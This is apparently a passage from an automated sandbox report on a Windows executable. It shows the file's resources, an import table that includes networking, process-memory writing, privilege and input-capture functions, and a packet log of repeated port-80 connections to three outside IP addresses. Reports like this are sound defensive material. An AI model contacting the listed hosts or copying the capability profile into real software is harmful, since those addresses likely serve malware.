            RT_ICON0xd48000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.273686679174484
            RT_ICON0xd58a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5416666666666666
            RT_MENU0xd5d100x50dataEnglishGreat Britain0.9
            RT_STRING0xd5d600x594dataEnglishGreat Britain0.3333333333333333
            RT_STRING0xd62f40x68adataEnglishGreat Britain0.2735961768219833
            RT_STRING0xd69800x490dataEnglishGreat Britain0.3715753424657534
            RT_STRING0xd6e100x5fcdataEnglishGreat Britain0.3087467362924282
            RT_STRING0xd740c0x65cdataEnglishGreat Britain0.34336609336609336
            RT_STRING0xd7a680x466dataEnglishGreat Britain0.3605683836589698
            RT_STRING0xd7ed00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
            RT_RCDATA0xd80280x511c8data1.0003341038792168
            RT_GROUP_ICON0x1291f00x22dataEnglishGreat Britain1.0588235294117647
            RT_GROUP_ICON0x1292140x14dataEnglishGreat Britain1.25
            RT_GROUP_ICON0x1292280x14dataEnglishGreat Britain1.15
            RT_GROUP_ICON0x12923c0x14dataEnglishGreat Britain1.25
            RT_VERSION0x1292500xdcdataEnglishGreat Britain0.6181818181818182
            RT_MANIFEST0x12932c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
            DLLImport
            WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
            MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
            WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
            PSAPI.DLLGetProcessMemoryInfo
            IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
            USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
            UxTheme.dllIsThemeActive
            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
            USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
            GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
            SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
            OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
            Language of compilation systemCountry where language is spokenMap
            EnglishGreat Britain
            TimestampSource PortDest PortSource IPDest IP
            Sep 2, 2024 09:07:55.324074984 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:55.329042912 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:55.329127073 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:55.337939024 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:55.343292952 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254003048 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254030943 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254046917 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254177094 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254192114 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254199028 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:56.254221916 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254240990 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:56.254245043 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254260063 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254261971 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:56.254276991 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254303932 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:56.254823923 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.254863977 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:56.255165100 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:07:56.255206108 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:56.259722948 CEST4971980192.168.2.6194.233.65.154
            Sep 2, 2024 09:07:56.265213013 CEST8049719194.233.65.154192.168.2.6
            Sep 2, 2024 09:08:11.317960024 CEST4972180192.168.2.645.157.69.194
            Sep 2, 2024 09:08:11.323379993 CEST804972145.157.69.194192.168.2.6
            Sep 2, 2024 09:08:11.323481083 CEST4972180192.168.2.645.157.69.194
            Sep 2, 2024 09:08:11.335092068 CEST4972180192.168.2.645.157.69.194
            Sep 2, 2024 09:08:11.342166901 CEST804972145.157.69.194192.168.2.6
            Sep 2, 2024 09:08:12.182842016 CEST804972145.157.69.194192.168.2.6
            Sep 2, 2024 09:08:12.183238029 CEST804972145.157.69.194192.168.2.6
            Sep 2, 2024 09:08:12.183290958 CEST4972180192.168.2.645.157.69.194
            Sep 2, 2024 09:08:12.841736078 CEST4972180192.168.2.645.157.69.194
            Sep 2, 2024 09:08:13.860831976 CEST4972380192.168.2.645.157.69.194
            Sep 2, 2024 09:08:13.868694067 CEST804972345.157.69.194192.168.2.6
            Sep 2, 2024 09:08:13.868771076 CEST4972380192.168.2.645.157.69.194
            Sep 2, 2024 09:08:13.880590916 CEST4972380192.168.2.645.157.69.194
            Sep 2, 2024 09:08:13.890455008 CEST804972345.157.69.194192.168.2.6
            Sep 2, 2024 09:08:14.765332937 CEST804972345.157.69.194192.168.2.6
            Sep 2, 2024 09:08:14.765619993 CEST804972345.157.69.194192.168.2.6
            Sep 2, 2024 09:08:14.765692949 CEST4972380192.168.2.645.157.69.194
            Sep 2, 2024 09:08:15.388701916 CEST4972380192.168.2.645.157.69.194
            Sep 2, 2024 09:08:16.407275915 CEST4972480192.168.2.645.157.69.194
            Sep 2, 2024 09:08:16.413177967 CEST804972445.157.69.194192.168.2.6
            Sep 2, 2024 09:08:16.413264990 CEST4972480192.168.2.645.157.69.194
            Sep 2, 2024 09:08:16.424971104 CEST4972480192.168.2.645.157.69.194
            Sep 2, 2024 09:08:16.430725098 CEST804972445.157.69.194192.168.2.6
            Sep 2, 2024 09:08:16.431077957 CEST804972445.157.69.194192.168.2.6
            Sep 2, 2024 09:08:17.528681040 CEST804972445.157.69.194192.168.2.6
            Sep 2, 2024 09:08:17.528703928 CEST804972445.157.69.194192.168.2.6
            Sep 2, 2024 09:08:17.528815985 CEST4972480192.168.2.645.157.69.194
            Sep 2, 2024 09:08:17.935369968 CEST4972480192.168.2.645.157.69.194
            Sep 2, 2024 09:08:18.954138994 CEST4972580192.168.2.645.157.69.194
            Sep 2, 2024 09:08:18.959465027 CEST804972545.157.69.194192.168.2.6
            Sep 2, 2024 09:08:18.959552050 CEST4972580192.168.2.645.157.69.194
            Sep 2, 2024 09:08:18.967560053 CEST4972580192.168.2.645.157.69.194
            Sep 2, 2024 09:08:18.972681046 CEST804972545.157.69.194192.168.2.6
            Sep 2, 2024 09:08:19.838300943 CEST804972545.157.69.194192.168.2.6
            Sep 2, 2024 09:08:19.838705063 CEST804972545.157.69.194192.168.2.6
            Sep 2, 2024 09:08:19.838805914 CEST4972580192.168.2.645.157.69.194
            Sep 2, 2024 09:08:19.844399929 CEST4972580192.168.2.645.157.69.194
            Sep 2, 2024 09:08:19.849360943 CEST804972545.157.69.194192.168.2.6
            Sep 2, 2024 09:08:24.933486938 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:24.938508034 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:24.938586950 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:24.951453924 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:24.956490993 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792175055 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792192936 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792205095 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792259932 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.792432070 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792448997 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792459965 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792470932 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792479038 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.792493105 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792501926 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.792530060 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.792592049 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792603016 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.792639017 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.797130108 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.797195911 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.797208071 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.797245979 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.841635942 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.874854088 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.874926090 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.874943018 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.874954939 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.874968052 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.874977112 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.874999046 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.875104904 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875149012 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.875224113 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875236034 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875272036 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.875561953 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875572920 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875591040 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875602007 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875612020 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.875614882 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.875641108 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.876293898 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.876337051 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:25.876420975 CEST804972637.187.158.211192.168.2.6
            Sep 2, 2024 09:08:25.876485109 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:26.466922045 CEST4972680192.168.2.637.187.158.211
            Sep 2, 2024 09:08:27.485271931 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:27.490371943 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:27.490473986 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:27.502348900 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:27.507297039 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.335948944 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336036921 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336049080 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336061001 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336074114 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336085081 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336086035 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.336122036 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.336122036 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.336162090 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336174965 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336214066 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.336529970 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336541891 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.336587906 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.342641115 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.342655897 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.342668056 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.342720985 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.417756081 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.417783022 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.417795897 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.417807102 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.417820930 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.417892933 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.417944908 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.418066025 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.418077946 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.418092012 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.418118954 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.418133020 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.418735981 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.418936968 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.418950081 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.418981075 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.419006109 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.419018030 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.419059038 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.419558048 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.419606924 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:28.419698954 CEST804972937.187.158.211192.168.2.6
            Sep 2, 2024 09:08:28.419748068 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:29.029247046 CEST4972980192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.048448086 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.053419113 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.053531885 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.065471888 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.070493937 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.070641041 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976118088 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976288080 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976299047 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976309061 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976320028 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976331949 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976344109 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976351023 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.976397991 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.976593971 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976613045 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976624966 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.976643085 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.976701975 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:30.981173992 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.981234074 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.981245995 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:30.981281042 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063008070 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063097000 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063108921 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063155890 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063277960 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063290119 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063301086 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063313961 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063325882 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063325882 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063337088 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063344955 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063349009 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063360929 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063389063 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063414097 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063422918 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063433886 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063465118 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063600063 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063640118 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.063950062 CEST804973037.187.158.211192.168.2.6
            Sep 2, 2024 09:08:31.063997984 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:31.576422930 CEST4973080192.168.2.637.187.158.211
            Sep 2, 2024 09:08:32.595038891 CEST4973180192.168.2.637.187.158.211
            Sep 2, 2024 09:08:32.600923061 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:32.601052999 CEST4973180192.168.2.637.187.158.211
            Sep 2, 2024 09:08:32.609088898 CEST4973180192.168.2.637.187.158.211
            Sep 2, 2024 09:08:32.613995075 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.465836048 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.465857983 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.465869904 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.466005087 CEST4973180192.168.2.637.187.158.211
            Sep 2, 2024 09:08:33.466094971 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.466106892 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.466116905 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.466135025 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.466147900 CEST804973137.187.158.211192.168.2.6
            Sep 2, 2024 09:08:33.466202974 CEST4973180192.168.2.637.187.158.211
            Sep 2, 2024 09:08:33.466222048 CEST4973180192.168.2.637.187.158.211
